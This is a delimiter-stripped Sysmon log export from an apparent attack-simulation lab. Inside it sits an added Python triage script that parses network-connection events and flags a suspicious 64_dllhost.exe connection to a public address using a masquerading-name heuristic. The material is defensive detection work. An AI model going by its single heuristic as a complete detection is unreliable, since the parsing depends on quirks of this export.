Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8BA27924D911D77CC891BF58227721,SHA256=76A9757137C4B5ED8CEFEF79D64DE7442C2DEDEE5DA86BC20594F5D2DBC511F3falsefalse - insufficient disk space 10341000x80000000000000001095064Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.495{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095063Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:09.495{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095086Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.995{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F0FC93AA8BCE1ED63324C48DCCB300,SHA256=DB0B1007061D4240EB9D420109DCC0D0FA6A4B4112E686263EB7035E75614980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095085Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.994{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC349ED729F5A06D756F5ADA5C48DA76,SHA256=5F18D8769EEF1B53837106FB6FB491D06D44DD4787DDB14DF6B75D47CDB98060,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:10.797{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 
23542300x80000000000000001606073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:10.797{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DCB212847CFD062AA02CB6A01F70F1D,SHA256=BA900A8A42ADB46E9569B93CB1741326C874802270C95EDE823B85EBA4E150EBfalsefalse - insufficient disk space 10341000x80000000000000001095084Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.656{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095083Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
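The export above has had its field delimiters stripped, so each Sysmon event is a single run of fused values. The following is an added example, not part of the original dataset: it carves the Event ID 3 (NetworkConnect) records back out of that fused text with a regex and runs two triage checks over them, flagging an outbound connection to a public address from a binary outside C:\Windows or C:\Program Files, and a binary whose name resembles a Windows system executable (dllhost, svchost, rundll32, ...) but does not live under C:\Windows. The sample input is constructed by copying three EID 3 records from this page (the Desktop 64_dllhost.exe connection to 34.218.235.219:443 and the two streamfwd.exe connections to 10.0.1.12:8000); the assumed field order is Sysmon's own EID 3 layout, and reading the `354300x8000000000000000` prefix as EventID/Version/Level/Task/Opcode/Keywords run together is my inference from the export, as is the list of "system-looking" names used by the heuristic.

```python
"""Carve Sysmon Event ID 3 (NetworkConnect) records out of a delimiter-less
export and flag the outbound connections worth a look.

Added example; not part of the original dataset. Assumptions (mine):
the '354300x8000000000000000' prefix is EventID 3 / Version 5 / Level 4 /
Task 3 / Opcode 0 / Keywords run together by the export, and the fields that
follow are in Sysmon's EID 3 order (ProcessGuid, ProcessId, Image, User,
Protocol, Initiated, SourceIsIpv6, SourceIp, SourceHostname, SourcePort,
SourcePortName, DestinationIsIpv6, DestinationIp, DestinationHostname,
DestinationPort, DestinationPortName).
"""
import ipaddress
import re

# Constructed sample: three EID 3 records copied from the dump and joined by a
# space the way the export does; the third keeps the export's line break that
# falls inside the timestamp.
SAMPLE = (
    "354300x80000000000000001095042Microsoft-Windows-Sysmon/Operational"
    "win-dc-982.attackrange.local-2021-04-21 19:18:00.330"
    "{761B69BB-65B6-6080-265D-00000000BA01}2304"
    "C:\\Users\\Administrator\\Desktop\\64_dllhost.exeATTACKRANGE\\Administrator"
    "tcptruefalse10.0.1.14win-dc-982.attackrange.local1144-"
    "false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https "
    "354300x80000000000000001606062Microsoft-Windows-Sysmon/Operational"
    "win-host-5.attackrange.local-2021-04-21 19:18:04.602"
    "{21761711-8431-607D-C500-00000000BB01}3840"
    "C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream"
    "\\windows_x86_64\\bin\\streamfwd.exeNT AUTHORITY\\SYSTEM"
    "tcptruefalse10.0.1.15win-host-5.attackrange.local49727-"
    "false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- "
    "354300x80000000000000001095061Microsoft-Windows-Sysmon/Operational"
    "win-dc-982.attackrange.local-2021-04-21 \n19:18:03.763"
    "{761B69BB-8207-607D-CF00-00000000BA01}4116"
    "C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream"
    "\\windows_x86_64\\bin\\streamfwd.exeNT AUTHORITY\\SYSTEM"
    "tcptruefalse10.0.1.14win-dc-982.attackrange.local1145-"
    "false10.0.1.12-8000-"
)

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Sysmon writes '-' when it has no name; the hostnames in this export end in a
# letter, which is the only thing separating them from the port digits after them.
HOST = r"-|[A-Za-z0-9.-]*?[A-Za-z]"
EID3 = re.compile(
    r"354300x8000000000000000(?P<record>\d+)Microsoft-Windows-Sysmon/Operational"
    r"(?P<computer>[\w.-]+?)-(?P<utc>\d{4}-\d\d-\d\d\s+\d\d:\d\d:\d\d\.\d{3})"
    r"\{(?P<pguid>[0-9A-F-]{36})\}(?P<pid>\d+)"
    r"(?P<image>[A-Za-z]:\\.+?\.exe)(?P<user>.+?)"
    r"(?P<proto>tcp|udp)(?P<initiated>true|false)(?P<src6>true|false)"
    rf"(?P<sip>{IPV4})(?P<shost>{HOST})(?P<sport>\d+)(?P<sportname>-|[a-z]+)"
    rf"(?P<dst6>true|false)(?P<dip>{IPV4})(?P<dhost>{HOST})(?P<dport>\d+)(?P<dportname>-|[a-z]+)"
    r"(?=\s|$)"  # a record ends at the separator before the next event or at end of input
)

# Heuristic list (assumption): names an attacker borrows to blend in with Windows.
WINDOWS_NAMES = ("dllhost", "svchost", "rundll32", "conhost", "lsass", "csrss", "explorer")
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def parse_eid3(text):
    """Return every EID 3 record in the fused text as a dict of its Sysmon fields."""
    events = []
    for m in EID3.finditer(text):
        ev = m.groupdict()
        ev["utc"] = " ".join(ev["utc"].split())  # undo a line break inside the timestamp
        events.append(ev)
    return events


def triage(ev):
    """Reasons this connection deserves a look; an empty list means neither check fired."""
    reasons = []
    image = ev["image"].lower()
    name = image.rsplit("\\", 1)[-1]
    outbound = ev["initiated"] == "true"
    dst = ipaddress.ip_address(ev["dip"])
    if outbound and dst.is_global and not image.startswith(TRUSTED_ROOTS):
        reasons.append(f"outbound to public {ev['dip']}:{ev['dport']} from user-writable path {ev['image']}")
    if any(w in name for w in WINDOWS_NAMES) and not image.startswith("c:\\windows\\"):
        reasons.append(f"{name} resembles a Windows binary but runs from {ev['image']}")
    return reasons


def findings(text):
    """Parse and triage; return only the flagged records with their reasons."""
    out = []
    for ev in parse_eid3(text):
        why = triage(ev)
        if why:
            out.append({"record": ev["record"], "computer": ev["computer"], "utc": ev["utc"],
                        "image": ev["image"], "dest": f"{ev['dip']}:{ev['dport']}", "reasons": why})
    return out


if __name__ == "__main__":
    for f in findings(SAMPLE):
        print(f["record"], f["computer"], f["utc"], f["image"], "->", f["dest"])
        for r in f["reasons"]:
            print("   ", r)
```

On this sample only record 1095042 is flagged, on both counts; the two Splunk streamfwd.exe connections go to a private address from a trusted install path and pass. The carving depends on a property of this export that is not guaranteed in general: a hostname that ends in a digit would be fused with the port that follows it and the record would fail to match, so treat this as a recovery tool for a damaged dump and prefer the original XML or CSV whenever it is still available.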
10341000x80000000000000001095082Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095081Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095080Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:10.654{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095079Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.654{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095078Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.653{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095077Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.653{761B69BB-7A72-6080-965F-00000000BA01}6360C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001095076Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:10.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095075Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095074Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:10.124{761B69BB-7A71-6080-955F-00000000BA01}63403520C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.884{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:11.884{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B25206418ABC6C71AD1520DC772A506,SHA256=8C8CB0FCCCE9424230318CC999388A42BBAEE9A66538250B2FC0F07C137BD483falsefalse - insufficient disk space 10341000x80000000000000001095097Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095096Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:11.496{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095095Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.453{761B69BB-7A73-6080-975F-00000000BA01}24606908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095094Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.321{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A73-6080-975F-00000000BA01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001095093Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.319{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095092Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.319{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095091Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:11.318{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095090Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 